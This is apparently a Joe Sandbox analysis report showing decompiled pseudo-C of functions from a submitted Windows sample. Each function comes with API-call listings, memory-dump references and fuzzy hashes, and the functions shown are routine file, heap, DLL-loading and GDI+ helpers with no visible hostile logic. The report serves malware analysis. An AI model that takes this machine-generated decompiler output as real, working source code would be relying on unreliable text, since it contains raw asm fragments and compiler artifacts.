				void* _t17;
				long _t21;
				intOrPtr* _t23;
				long _t24;
				void* _t28;
				long _t30;
				void* _t32;
				intOrPtr* _t35;
				void* _t36;
				long _t38;

				_t32 = __esi;
				_t35 = _t23;
				if( *(_t35 + 4) == 0xffffffff) {
					L13:
					return 1;
				}
				_t21 =  *(_t36 + 0x14);
				_t30 =  *(_t36 + 0x14);
				_t38 = _t21;
				if(_t38 > 0 || _t38 >= 0 && _t30 >= 0) {
					_t24 =  *(_t36 + 0x1c);
				} else {
					_t24 =  *(_t36 + 0x1c);
					if(_t24 != 0) {
						if(_t24 != 1) {
							_t17 = E000698E5(_t28);
						} else {
							 *0x93260(_t32);
							_t17 =  *((intOrPtr*)( *((intOrPtr*)( *_t35 + 0x14))))();
						}
						_t30 = _t30 + _t17;
						asm("adc ebx, edx");
						_t24 = 0;
					}
				}
				 *(_t36 + 0xc) = _t21;
				_t14 = SetFilePointer( *(_t35 + 4), _t30, _t36 + 0x10, _t24); // executed
				if(_t14 != 0xffffffff || GetLastError() == 0) {
					goto L13;
				} else {
					return 0;
				}
			}

0x00069b59
0x00069b5b
0x00069b61
0x00069bdb
0x00000000
0x00069bdb
0x00069b64
0x00069b69
0x00069b6d
0x00069b6f
0x00069ba9
0x00069b77
0x00069b77
0x00069b7d
0x00069b82
0x00069b9c
0x00069b84
0x00069b8d
0x00069b95
0x00069b97
0x00069ba1
0x00069ba3
0x00069ba5
0x00069ba5
0x00069b7d
0x00069baf
0x00069bc0
0x00069bcb
0x00000000
0x00069bd7
0x00000000
0x00069bd7

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00069B35,?,?,00000000,?,?,00068D9C,?), ref: 00069BC0
GetLastError.KERNEL32 ref: 00069BCD

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: ea16f4cb63a0f9746dfa4c6f1cbcb0c1594008e544b16c28380e6dcdb35fb2b5
Instruction ID: 48327610a2aa5fabdc77030605f7a5d6507ea90b667359b2b4aecb2af1d5ab6b
Opcode Fuzzy Hash: ea16f4cb63a0f9746dfa4c6f1cbcb0c1594008e544b16c28380e6dcdb35fb2b5
Instruction Fuzzy Hash: 990104313042059F8B18CF65BE9497EB39FEFC1321B14552EF91287A81CB31D8099B20

Uniqueness

Uniqueness Score: -1.00%

Function 00069E40 Relevance: 3.1, APIs: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00069E40() {
				long _v4;
				void* __ecx;
				void* __ebp;
				long _t12;
				signed int _t14;
				signed int _t21;
				signed int _t22;
				void* _t23;
				long _t32;
				void* _t34;

				_t34 = _t23;
				_t22 = _t21 | 0xffffffff;
				if( *(_t34 + 4) != _t22) {
					L3:
					_v4 = _v4 & 0x00000000;
					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
					_t32 = _t12;
					if(_t32 != _t22 || GetLastError() == 0) {
						L7:
						asm("cdq");
						_t14 = 0 + _t32;
						asm("adc edx, 0x0");
						goto L8;
					} else {
						if( *((char*)(_t34 + 0x1a)) == 0) {
							_t14 = _t22;
							L8:
							return _t14;
						}
						E00066FA5(0xa0f50, 0xa0f50, _t34 + 0x24);
						goto L7;
					}
				}
				if( *((char*)(_t34 + 0x1a)) == 0) {
					return _t22;
				}
				E00066FA5(0xa0f50, 0xa0f50, _t34 + 0x24);
				goto L3;
			}

0x00069e44
0x00069e46
0x00069e51
0x00069e64
0x00069e64
0x00069e76
0x00069e7c
0x00069e80
0x00069e9d
0x00069ea3
0x00069ea8
0x00069eaa
0x00000000
0x00069e8c
0x00069e90
0x00069eb9
0x00069ead
0x00000000
0x00069ead
0x00069e98
0x00000000
0x00069e98
0x00069e80
0x00069e57
0x00000000
0x00069eb5
0x00069e5f
0x00000000

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00069E76
GetLastError.KERNEL32 ref: 00069E82

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: a6d567938434d24d6ad9608de3d650f84814599f465981d84715f01cd7f14615
Instruction ID: 536322c7c96a1b4931585439d58e6d328bc8ffa3a44d7fac9cc4dc6363e74449
Opcode Fuzzy Hash: a6d567938434d24d6ad9608de3d650f84814599f465981d84715f01cd7f14615
Instruction Fuzzy Hash: D501B1753042005FEB34DF69DC44B6BB7DEAB88314F14493EB146C3A80DA36EC488A10

Uniqueness

Uniqueness Score: -1.00%

Function 00088606 Relevance: 3.0, APIs: 2, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00088606(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = HeapReAlloc( *0xc16ec, 0, _t14, _t16);
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00088394();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E000871AD(_t10, _t13, _t16, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E0008895A())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E000884DE(_t14);
					goto L6;
				}
				_t9 = E00088518(__ecx, _a8); // executed
				return _t9;
			}

0x00088606
0x00088606
0x0008860c
0x00088611
0x0008861f
0x00088622
0x00088624
0x0008862f
0x00088632
0x00088659
0x00088663
0x00088669
0x0008866b
0x00000000
0x00000000
0x0008864a
0x0008864c
0x00000000
0x00000000
0x0008864f
0x00088654
0x00088655
0x00088657
0x00000000
0x00000000
0x00088657
0x00088641
0x00000000
0x00088641
0x00088634
0x00088639
0x0008863f
0x0008863f
0x0008863f
0x00000000
0x0008863f
0x00088627
0x00000000
0x0008862c
0x00088616
0x00000000

APIs

_free.LIBCMT ref: 00088627

Part of subcall function 00088518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0008C13D,00000000,?,000867E2,?,00000008,?,000889AD,?,?,?), ref: 0008854A

HeapReAlloc.KERNEL32(00000000,?,?,?,?,000A0F50,0006CE57,?,?,?,?,?,?), ref: 00088663

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: ed0292ca91fe1c66b047a2bf343fb3508fa766f5ff9b62c7bbf97538383debce
Instruction ID: e5d223df7a0c20a96b869e4c4e69d56ed93d063f1307de7bf2c7a074c9a01944
Opcode Fuzzy Hash: ed0292ca91fe1c66b047a2bf343fb3508fa766f5ff9b62c7bbf97538383debce
Instruction Fuzzy Hash: 29F0C232141115A6DB713A25AC04FAF3798BF927B0FA4C116F8D496192FF20CC2057A4

Uniqueness

Uniqueness Score: -1.00%

Function 00070908 Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00070908(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 == 0) {
					return _t8 + 1;
				}
				_t14 = 0;
				_t17 = _v8;
				_t15 = 1;
				do {
					if((_t17 & _t15) != 0) {
						_t14 = _t14 + 1;
					}
					_t15 = _t15 + _t15;
				} while (_t15 != 0);
				if(_t14 >= 1) {
					return _t14;
				}
				return 1;
			}

0x0007091c
0x00070924
0x00000000
0x00070926
0x0007092b
0x0007092f
0x00070932
0x00070934
0x00070936
0x00070938
0x00070938
0x00070939
0x00070939
0x00070940
0x00000000
0x00070942
0x00070947

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00070915
GetProcessAffinityMask.KERNEL32 ref: 0007091C

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: f23e92b4a8e9b7005f83196d2dfaf26525726062c18439ef446a111198739d53
Instruction ID: 962bccad6cdaf64cb406f98217b57547814187e8021ddfbcd951451d0b657428
Opcode Fuzzy Hash: f23e92b4a8e9b7005f83196d2dfaf26525726062c18439ef446a111198739d53
Instruction Fuzzy Hash: 0FE09B36E10105FBFF19CAA49C045BBB3DDEB44210710827ABA0ED3101F578DD018A68

Uniqueness

Uniqueness Score: -1.00%

Function 0006A444 Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0006A444(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t12;
				signed int _t18;
				signed int _t19;

				E0007E360();
				_push(_t18);
				_t12 = SetFileAttributesW(_a4, _a8); // executed
				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
				if(_t19 == 0 && E0006B66C(_a4,  &_v4100, 0x800) != 0) {
					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t19;
			}

0x0006a44c
0x0006a451
0x0006a458
0x0006a460
0x0006a465
0x0006a491
0x0006a491
0x0006a49a

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0006A27A,?,?,?,0006A113,?,00000001,00000000,?,?), ref: 0006A458
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0006A27A,?,?,?,0006A113,?,00000001,00000000,?,?), ref: 0006A489

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bff560000520d39851e05d1e1d6351af1ab8e97f81b1cecc51fa8f51196d1cb2
Instruction ID: a3aa7b7081e3fae66ca9e53f1a57a8da3429b7c57d2db8f07237c81f5e9a8d0b
Opcode Fuzzy Hash: bff560000520d39851e05d1e1d6351af1ab8e97f81b1cecc51fa8f51196d1cb2
Instruction Fuzzy Hash: B8F0A03124020D7BEF016F60DC05FDA37ADBB04385F048051BC8896161DB7A8EA8AE50

Uniqueness

Uniqueness Score: -1.00%

Function 0007D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0007D5A1
SetDlgItemTextW.USER32(00000065,?), ref: 0007D5B8

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 7686b295ae5bfd802c5ec89bdba35526905e9c3999dab99cdf0fa90e0e17925e
Instruction ID: 9bd7c2178c643c7551ece8f5099d322bb4ea07f62980d065017fb96fa504a2f9
Opcode Fuzzy Hash: 7686b295ae5bfd802c5ec89bdba35526905e9c3999dab99cdf0fa90e0e17925e
Instruction Fuzzy Hash: F6F05C31D003483BFB11BB708C06FDD375D9B09745F044582B604570A3D9396E204761

Uniqueness

Uniqueness Score: -1.00%

Function 0006A12D Relevance: 3.0, APIs: 2, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0006A12D(WCHAR* _a4) {
				short _v4100;
				int _t10;
				signed int _t16;
				signed int _t17;

				E0007E360();
				_push(_t16);
				_t10 = DeleteFileW(_a4); // executed
				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
				if(_t17 == 0 && E0006B66C(_a4,  &_v4100, 0x800) != 0) {
					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t17;
			}

0x0006a135
0x0006a13a
0x0006a13e
0x0006a146
0x0006a14b
0x0006a174
0x0006a174
0x0006a17d

APIs

DeleteFileW.KERNELBASE(?,?,?,0006984C,?,?,00069688,?,?,?,?,00091FA1,000000FF), ref: 0006A13E
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0006984C,?,?,00069688,?,?,?,?,00091FA1,000000FF), ref: 0006A16C

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: ef1c209a3e6dcfd83fde97347e7e8114d93bfb75c24918894ccdc3edeba9b4a6
Instruction ID: 1d16ced3c9edee29ff5ac4e7f091e6cf5119b8080f933776c2f2a8a6cedc6c51
Opcode Fuzzy Hash: ef1c209a3e6dcfd83fde97347e7e8114d93bfb75c24918894ccdc3edeba9b4a6
Instruction Fuzzy Hash: 06E022346402086BEB00AF20DC06FEA339CFB09381F484062B888D7061DB21CED4AE90

Uniqueness

Uniqueness Score: -1.00%

Function 0007A39D Relevance: 3.0, APIs: 2, Instructions: 27
comCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0007A39D(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t8;
				void* _t13;
				void* _t16;
				intOrPtr _t19;

				 *[fs:0x0] = _t19;
				_t5 =  *0xa8430; // 0x7439c100
				 *0x93260(_t5, _t13, _t16,  *[fs:0x0], E00091FA1, 0xffffffff);
				 *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))();
				L0007E244(); // executed
				_t8 =  *0xc2170( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t8;
			}

0x0007a3ae
0x0007a3b5
0x0007a3c6
0x0007a3cc
0x0007a3d1
0x0007a3d6
0x0007a3e0
0x0007a3eb

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00091FA1,000000FF), ref: 0007A3D1
OleUninitialize.OLE32(?,?,?,?,00091FA1,000000FF), ref: 0007A3D6

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 2276fb058b50f0cac803513681cdeafe1c1a1ff63f7eaa5f72600bcc0782fb8d
Instruction ID: 57ec1a89310fab35f94ecd4fba24fab7a6266432bde2d34e965d1cc06bb3678d
Opcode Fuzzy Hash: 2276fb058b50f0cac803513681cdeafe1c1a1ff63f7eaa5f72600bcc0782fb8d
Instruction Fuzzy Hash: 35F03032A18655DFC7109B4CDC05B55FBA8FB49B20F04436AF41983761CB786801CA91

Uniqueness

Uniqueness Score: -1.00%

Function 0006A194 Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0006A194(WCHAR* _a4) {
				short _v4100;
				long _t6;
				long _t11;
				long _t13;

				E0007E360();
				_t6 = GetFileAttributesW(_a4); // executed
				_t13 = _t6;
				if(_t13 == 0xffffffff && E0006B66C(_a4,  &_v4100, 0x800) != 0) {
					_t11 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t11;
				}
				return _t13;
			}

0x0006a19c
0x0006a1a5
0x0006a1ab
0x0006a1b0
0x0006a1d1
0x0006a1d7
0x0006a1d7
0x0006a1df

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0006A189,?,000676B2,?,?,?,?), ref: 0006A1A5
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0006A189,?,000676B2,?,?,?,?), ref: 0006A1D1

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c6fc76137c3dff029e6aeb6da8e594d3e6b473b9170431c88037192f645b132d
Instruction ID: a233435876f0607809aaf1064cb72dc18b0c2eaef9ba2f70e8e478463cf6fe18
Opcode Fuzzy Hash: c6fc76137c3dff029e6aeb6da8e594d3e6b473b9170431c88037192f645b132d
Instruction Fuzzy Hash: FDE09235A001286BDB20BB68DC15BD9B79DAB093E1F0042A2FD49E7291D7749E849EE1

Uniqueness

Uniqueness Score: -1.00%

Function 00070085 Relevance: 3.0, APIs: 2, Instructions: 25
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00070085(intOrPtr _a4) {
				short _v4100;
				struct HINSTANCE__* _t7;

				E0007E360();
				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
				if(_t7 != 0) {
					E0006B965( &_v4100, _a4,  &_v4100, 0x800);
					_t7 = LoadLibraryW( &_v4100); // executed
				}
				return _t7;
			}

0x0007008d
0x000700a0
0x000700a8
0x000700b6
0x000700c2
0x000700c2
0x000700cc

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000700A0
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0006EB86,Crypt32.dll,00000000,0006EC0A,?,?,0006EBEC,?,?,?), ref: 000700C2

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 5f9067faa0ac77125cc2f7ba168ee553404c05846db5afb0433075849cd3aac5
Instruction ID: 0b64f5c983db3cf0f2a2acc42246d324dc80b4bcc1e6b993c45733596a2dbbd8
Opcode Fuzzy Hash: 5f9067faa0ac77125cc2f7ba168ee553404c05846db5afb0433075849cd3aac5
Instruction Fuzzy Hash: 72E0127690125C6AEB219AA4DC09FD777ACFF0D392F0440A6BA48D3105DA789A948FF4

Uniqueness

Uniqueness Score: -1.00%

Function 00079B0F Relevance: 3.0, APIs: 2, Instructions: 24
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00079B0F(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0x94670;
				if(_a8 == 0) {
					L0007E22C(); // executed
				} else {
					L0007E232();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}

0x00079b12
0x00079b14
0x00079b16
0x00079b19
0x00079b1c
0x00079b24
0x00079b25
0x00079b28
0x00079b2e
0x00079b37
0x00079b30
0x00079b30
0x00079b30
0x00079b3c
0x00079b42
0x00079b4b

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00079B30
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00079B37

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: c00f7e1ae7dc1580153412bfd03212aa94d1b52e1eb1fa0f5f25ddebec229bfb
Instruction ID: 5a93b4e830e00ef6f0723274bb203511792044ec50af7ab51a5d101f075038c8
Opcode Fuzzy Hash: c00f7e1ae7dc1580153412bfd03212aa94d1b52e1eb1fa0f5f25ddebec229bfb
Instruction Fuzzy Hash: 19E0ED71901218EBCB60DF98D501AD9B7ECEB09321F10C09BE89993301D7796E049B95

Uniqueness

Uniqueness Score: -1.00%

Function 0008215C Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0008215C(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E0008329A(__eflags, E000820A0); // executed
				 *0x9e680 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E00083348(__eflags, _t1, 0xc1054);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E0008218F(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00082161
0x00082166
0x0008216f
0x0008217a
0x00082180
0x00082181
0x00082183
0x0008218e
0x00082185
0x00082185
0x00000000
0x00082185
0x00082171
0x00082171
0x00082173
0x00082173

APIs

Part of subcall function 0008329A: try_get_function.LIBVCRUNTIME ref: 000832AF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0008217A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00082185

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 511764e7bb3afe4ee9b94bdf006edceb84449ff65ab6a5345b074eab13af8b81
Instruction ID: b82bd7fa5f006fe629242185ac1c486d4853030225205e9056fd251658af914b
Opcode Fuzzy Hash: 511764e7bb3afe4ee9b94bdf006edceb84449ff65ab6a5345b074eab13af8b81
